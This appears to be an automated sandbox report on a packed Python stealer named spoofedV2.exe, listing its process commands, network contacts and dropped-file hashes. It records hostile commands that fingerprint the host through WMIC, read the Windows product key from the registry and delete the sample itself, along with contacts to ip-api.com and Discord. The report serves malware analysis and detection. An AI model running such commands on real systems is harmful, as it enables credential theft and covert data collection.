C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8c114cc40,0x7ff8c114cc4c,0x7ff8c114cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1980,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2216 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3268 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4428,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3564 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4600,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4400 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4764,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4904 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5024,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4936 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4656 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4648,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4656 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4556 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5392,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5316 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4836,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5540 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3456,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5320 /prefetch:8

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe

"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe

"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" /update /restart

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 216.58.204.67:443 gstatic.com tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.137.232:443 ptb.discord.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 chrome.google.com udp
GB 142.250.200.10:443 ogads-pa.googleapis.com tcp
GB 172.217.16.238:443 play.google.com tcp
GB 216.58.201.110:443 chrome.google.com tcp
GB 142.250.200.10:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
GB 172.217.16.238:443 play.google.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.178.14:443 clients2.google.com tcp
GB 216.58.213.1:443 clients2.googleusercontent.com tcp
GB 172.217.169.3:443 beacons.gcp.gvt2.com tcp
GB 104.86.110.128:443 tcp
US 95.100.195.173:443 r.bing.com tcp
US 95.100.195.173:443 r.bing.com tcp
US 95.100.195.173:443 r.bing.com tcp
US 95.100.195.173:443 r.bing.com tcp
US 95.100.195.173:443 r.bing.com tcp
US 95.100.195.173:443 r.bing.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI43082\python311.dll

MD5 1e76961ca11f929e4213fca8272d0194
SHA1 e52763b7ba970c3b14554065f8c2404112f53596
SHA256 8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0
SHA512 ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b

C:\Users\Admin\AppData\Local\Temp\_MEI43082\VCRUNTIME140.dll

MD5 870fea4e961e2fbd00110d3783e529be
SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

memory/352-25-0x00007FF8D23C0000-0x00007FF8D29AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43082\base_library.zip

MD5 1c9a020e8bfc99a77f51c7d5ceb937f1
SHA1 9b2c6f0c4d16ac0b69e5232648b6e6c5df39cd9c
SHA256 2ce10a77f29612f9afd3fb21baaf38162fdc484174aec051a32eeaef28ce8b37
SHA512 98312712c4be133d979b9699e661c451cd8c27ae4c5abc295c359fd857d20b3fde55e6555bdd2230d580903bb230798fba2c72381b263327f5d0820d28ddfbea

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_ctypes.pyd

MD5 7ecc651b0bcf9b93747a710d67f6c457
SHA1 ebb6dcd3998af9fff869184017f2106d7a9c18f3
SHA256 b43963b0883ba2e99f2b7dd2110d33063071656c35e6575fca203595c1c32b1a
SHA512 1ff4837e100bc76f08f4f2e9a7314bcaf23ebfa4f9a82dc97615cde1f3d29416004c6346e51afc6e61360573df5fcd2a3b692fd544ccad5c616fb63ac49303c5

C:\Users\Admin\AppData\Local\Temp\_MEI43082\libffi-8.dll

MD5 87786718f8c46d4b870f46bcb9df7499
SHA1 a63098aabe72a3ed58def0b59f5671f2fd58650b
SHA256 1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33
SHA512 3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7

memory/352-48-0x00007FF8DC230000-0x00007FF8DC23F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_ssl.pyd

MD5 8f94142c7b4015e780011c1b883a2b2f
SHA1 c9c3c1277cca1e8fe8db366ca0ecb4a264048f05
SHA256 8b6c028a327e887f1b2ccd35661c4c7c499160e0680ca193b5c818327a72838c
SHA512 7e29163a83601ed1078c03004b3d40542e261fda3b15f22c2feec2531b05254189ae1809c71f9df78a460bf2282635e2287617f2992b6b101854ddd74fcad143

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_sqlite3.pyd

MD5 72a0715cb59c5a84a9d232c95f45bf57
SHA1 3ed02aa8c18f793e7d16cc476348c10ce259feb7
SHA256 d125e113e69a49e46c5534040080bdb35b403eb4ff4e74abf963bce84a6c26ad
SHA512 73c0e768ee0c2e6ac660338d2268540254efe44901e17271595f20f335ada3a9a8af70845e8a253d83a848d800145f7ecb23c92be90e7dd6e5400f72122d09de

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_socket.pyd

MD5 57dc6a74a8f2faaca1ba5d330d7c8b4b
SHA1 905d90741342ac566b02808ad0f69e552bb08930
SHA256 5b73b9ea327f7fb4cefddd65d6050cdec2832e2e634fcbf4e98e0f28d75ad7ca
SHA512 5e2b882fc51f48c469041028b01f6e2bfaf5a49005ade7e82acb375709e74ad49e13d04fd7acb6c0dbe05f06e9966a94753874132baf87858e1a71dcffc1dc07

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_queue.pyd

MD5 f1e7c157b687c7e041deadd112d61316
SHA1 2a7445173518a342d2e39b19825cf3e3c839a5fe
SHA256 d92eadb90aed96acb5fac03bc79553f4549035ea2e9d03713d420c236cd37339
SHA512 982fd974e5892af9f360dc4c7ccaa59928e395ccef8ea675fadb4cf5f16b29350bf44c91ea1fd58d90cbca02522eba9543162e19c38817edbfd118bc254515da

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_lzma.pyd

MD5 71f0b9f90aa4bb5e605df0ea58673578
SHA1 c7c01a11b47dc6a447c7475ef6ba7dec7c7ba24e
SHA256 d0e10445281cf3195c2a1aa4e0e937d69cae07c492b74c9c796498db33e9f535
SHA512 fc63b8b48d6786caecaf1aa3936e5f2d8fcf44a5a735f56c4200bc639d0cb9c367151a7626aa5384f6fc126a2bd0f068f43fd79277d7ec9adfc4dcb4b8398ae2

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_hashlib.pyd

MD5 7edb6c172c0e44913e166abb50e6fba6
SHA1 3f8c7d0ff8981d49843372572f93a6923f61e8ed
SHA256 258ad0d7e8b2333b4b260530e14ebe6abd12cae0316c4549e276301e5865b531
SHA512 2a59cc13a151d8800a29b4f9657165027e5bf62be1d13c2e12529ef6b7674657435bfd3cc16500b2aa7ce95b405791dd007c01adf4cdd229746bd2218bfdc03f

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_decimal.pyd

MD5 0cfe09615338c6450ac48dd386f545fd
SHA1 61f5bd7d90ec51e4033956e9ae1cfde9dc2544fe
SHA256 a0fa3ad93f98f523d189a8de951e42f70cc1446793098151fc50ba6b5565f2e3
SHA512 42b293e58638074ce950775f5ef10ec1a0bb5980d0df74ad89907a17f7016d68e56c6ded1338e9d04d19651f48448deee33a0657d3c03adba89406d6e5f10c18

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_bz2.pyd

MD5 83b5d1943ac896a785da5343614b16bc
SHA1 9d94b7f374030fed7f6e876434907561a496f5d9
SHA256 bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a
SHA512 5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c

C:\Users\Admin\AppData\Local\Temp\_MEI43082\unicodedata.pyd

MD5 908e8c719267692de04434ab9527f16e
SHA1 5657def35fbd3e5e088853f805eddd6b7b2b3ce9
SHA256 4337d02a4b24467a48b37f1ccbcebd1476ff10bdb6511fbb80030bbe45a25239
SHA512 4f9912803f1fa9f8a376f56e40a6608a0b398915b346d50b6539737f9b75d8e9a905beb5aace5fe69ba8847d815c600eb20330e79a2492168735b5cfdceff39a

memory/352-39-0x00007FF8D60F0000-0x00007FF8D6113000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43082\sqlite3.dll

MD5 abe8eec6b8876ddad5a7d60640664f40
SHA1 0b3b948a1a29548a73aaf8d8148ab97616210473
SHA256 26fc80633494181388cf382f417389c59c28e9ffedde8c391d95eddb6840b20d
SHA512 de978d97c04bad9ebb3f423210cbcb1b78a07c21daadc5c166e00206ece8dcd7baac1d67c84923c9cc79c8b9dfbec719ce7b5f17343a069527bba1a4d0454c29

C:\Users\Admin\AppData\Local\Temp\_MEI43082\select.pyd

MD5 938c814cc992fe0ba83c6f0c78d93d3f
SHA1 e7c97e733826e53ff5f1317b947bb3ef76adb520
SHA256 9c9b62c84c2373ba509c42adbca01ad184cd525a81ccbcc92991e0f84735696e
SHA512 2f175f575e49de4b8b820171565aedb7474d52ae9914e0a541d994ff9fea38971dd5a34ee30cc570920b8618393fc40ab08699af731005542e02a6a0095691f0

C:\Users\Admin\AppData\Local\Temp\_MEI43082\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI43082\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI43082\libssl-1_1.dll

MD5 7bcb0f97635b91097398fd1b7410b3bc
SHA1 7d4fc6b820c465d46f934a5610bc215263ee6d3e
SHA256 abe8267f399a803224a1f3c737bca14dee2166ba43c1221950e2fbce1314479e
SHA512 835bab65d00884912307694c36066528e7b21f3b6e7a1b9c90d4da385334388af24540b9d7a9171e89a4802612a8b6523c77f4752c052bf47adbd6839bc4b92c

C:\Users\Admin\AppData\Local\Temp\_MEI43082\libcrypto-1_1.dll

MD5 e5aecaf59c67d6dd7c7979dfb49ed3b0
SHA1 b0a292065e1b3875f015277b90d183b875451450
SHA256 9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1
SHA512 145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

C:\Users\Admin\AppData\Local\Temp\_MEI43082\blank.aes

MD5 d936f326b9332ec8a96d690bc0d18e2e
SHA1 827e5db1b9780c999e89b9b3efbc315d019ec4cb
SHA256 c5b45dac2943042d5291e58c703812b6feec8ce382474ee925ff47ecd47505e0
SHA512 e62533085278f553133e8bee5c14b6d989a4309f5f62adcbb82212eba869645d5780ff87efaea767b1423c3c18bc1bf947913f13dd3cf1d8dffcbfae0f739a80

memory/352-54-0x00007FF8D5FA0000-0x00007FF8D5FCD000-memory.dmp

memory/352-56-0x00007FF8D8F80000-0x00007FF8D8F99000-memory.dmp

memory/352-58-0x00007FF8D5C10000-0x00007FF8D5C33000-memory.dmp

memory/352-60-0x00007FF8D2A70000-0x00007FF8D2BDF000-memory.dmp

memory/352-62-0x00007FF8D83C0000-0x00007FF8D83D9000-memory.dmp

memory/352-64-0x00007FF8D6870000-0x00007FF8D687D000-memory.dmp

memory/352-66-0x00007FF8D5BE0000-0x00007FF8D5C0E000-memory.dmp

memory/352-73-0x0000018F13BF0000-0x0000018F13F65000-memory.dmp

memory/352-72-0x00007FF8D2300000-0x00007FF8D23B8000-memory.dmp

memory/352-74-0x00007FF8D00B0000-0x00007FF8D0425000-memory.dmp

memory/352-71-0x00007FF8D60F0000-0x00007FF8D6113000-memory.dmp

memory/352-70-0x00007FF8D23C0000-0x00007FF8D29AA000-memory.dmp

memory/352-76-0x00007FF8D5F80000-0x00007FF8D5F94000-memory.dmp

memory/352-79-0x00007FF8D60E0000-0x00007FF8D60ED000-memory.dmp

memory/352-78-0x00007FF8D5FA0000-0x00007FF8D5FCD000-memory.dmp

memory/352-83-0x00007FF8D21E0000-0x00007FF8D22FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ksgr1zhp.b5l.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1944-98-0x0000021E49310000-0x0000021E49332000-memory.dmp

memory/352-160-0x00007FF8D5C10000-0x00007FF8D5C33000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

\??\c:\Users\Admin\AppData\Local\Temp\mztqsn5r\mztqsn5r.cmdline

MD5 adac471bbe6268e0b8973b03b751aa28
SHA1 a43314e6961d6f1768c05fe104abd59657df3bab
SHA256 be2f13069bc8681a4c9765e5032d7dee5c05d05eba44a2536b5f46bd739c441c
SHA512 df2858ace183d4b8ae6869a65ff5a4391688f5e5338ae1289b623235ef64339b895cb0e6299870f13398440f5fc420d043d20eb1e81db5dcc5ddaeb3f82f59e4

\??\c:\Users\Admin\AppData\Local\Temp\mztqsn5r\mztqsn5r.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\mztqsn5r\CSCF4D9769ABFF04899BC49BE9CC0D64E8.TMP

MD5 4cad2d34bcfaaecf78938446c9aa59ea
SHA1 bf1de91943ee2de70eb7d290d2848f69f2f248f5
SHA256 7ea5d8fefe1f3fd72663200dff161c2194f38a3582630471dde4be5599f489db
SHA512 4ab35e336c141d0d694b5f924a73a4322ada92d96c7c212ebd528c7d262ef73815f9473cbcadbe2841b2e12f692e5f74449ab9890690d83901f4868a6a23f335

C:\Users\Admin\AppData\Local\Temp\RES78E9.tmp

MD5 836d1eb141aa193149f3ad7727af42a8
SHA1 5541390e3b24bae7ec457de34743ecb01ccb2e7a
SHA256 161223f1b3ed4c3890377533423411cc724ec90d3d1080dc08dcb0e55ac857e3
SHA512 0aeae299ceee91d658b40a4567f68abfae110ba90b0569b3702ac77360bb6453b57bcb870e1ea573162bbda1a35495c865ee31f40c0d821ea32c93d0017e450e

C:\Users\Admin\AppData\Local\Temp\mztqsn5r\mztqsn5r.dll

MD5 f1bf80155834aa240c85195c08f88a09
SHA1 7b616ed50d491c83c8009a8e0cd8b8ce0e5961ce
SHA256 4dc9418ba3d9b14d2d234b61b3a164075ad63d437704f518061751c9f05977c3
SHA512 3acfc5f6b93afb58f8ff12efb33bfad554ae9597d4c7d36047f846c0849f6a34c2806e05d7f7f356b607b7b39a344960f8388ab25b001d2bdfc9a1d22f423bba

memory/3508-199-0x00000265112A0000-0x00000265112A8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 74e4a39ae145a98de20041613220dfed
SHA1 ac5dd2331ae591d7d361e8947e1a8fba2c6bea12
SHA256 2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36
SHA512 96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

memory/352-204-0x00007FF8D2A70000-0x00007FF8D2BDF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA1 9910190edfaccece1dfcc1d92e357772f5dae8f7
SHA256 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA512 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 05b3cd21c1ec02f04caba773186ee8d0
SHA1 39e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256 911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512 e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa4f31835d07347297d35862c9045f4a
SHA1 83e728008935d30f98e5480fba4fbccf10cefb05
SHA256 99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0
SHA512 ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9fe4cd5675481c6c8c97e2f2e9c76c96
SHA1 b97159260e37b3fa7e89852d825d8cf0583258ee
SHA256 70403ccad41d73af48ab5773271d833c64dd42e97279c281e2ef76bdbd3c6f51
SHA512 8eeab245b6e6e43347d1db6afda002afded1d419dd440823efc44375ba24817d27323c21fe33c2bda4dbd414748cd4071759651c469b6b6691117fec9835e1ac

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 57083a8e45ebe4fd84c7c0f137ec3e21
SHA1 857b5ea57f7bcf03cadee122106c6e58792a9b84
SHA256 f20102c4dc409cad3cdaf7a330c3a18a730a9d7d902b9fbee2a84186cba93d40
SHA512 4bbc21c07c05ee1f783242f0fb59324d5ff9ae18bdf892f02980d582fed83380888eeba58e1a6a321507cfd5d4fe82a328a0d3482b29633be4e3ebbeac636f87

memory/352-265-0x00007FF8D83C0000-0x00007FF8D83D9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\  ‏       \Common Files\Desktop\BackupHide.temp

MD5 8735d8f1cc6616c640a7d070171983cf
SHA1 6a144aa075e65e92454e0f4cf28d27ee5e8dfac6
SHA256 1958bbc0d1f3558ad29a7191dc4ae3e2184be5e57df6709f5df7d38b949c046f
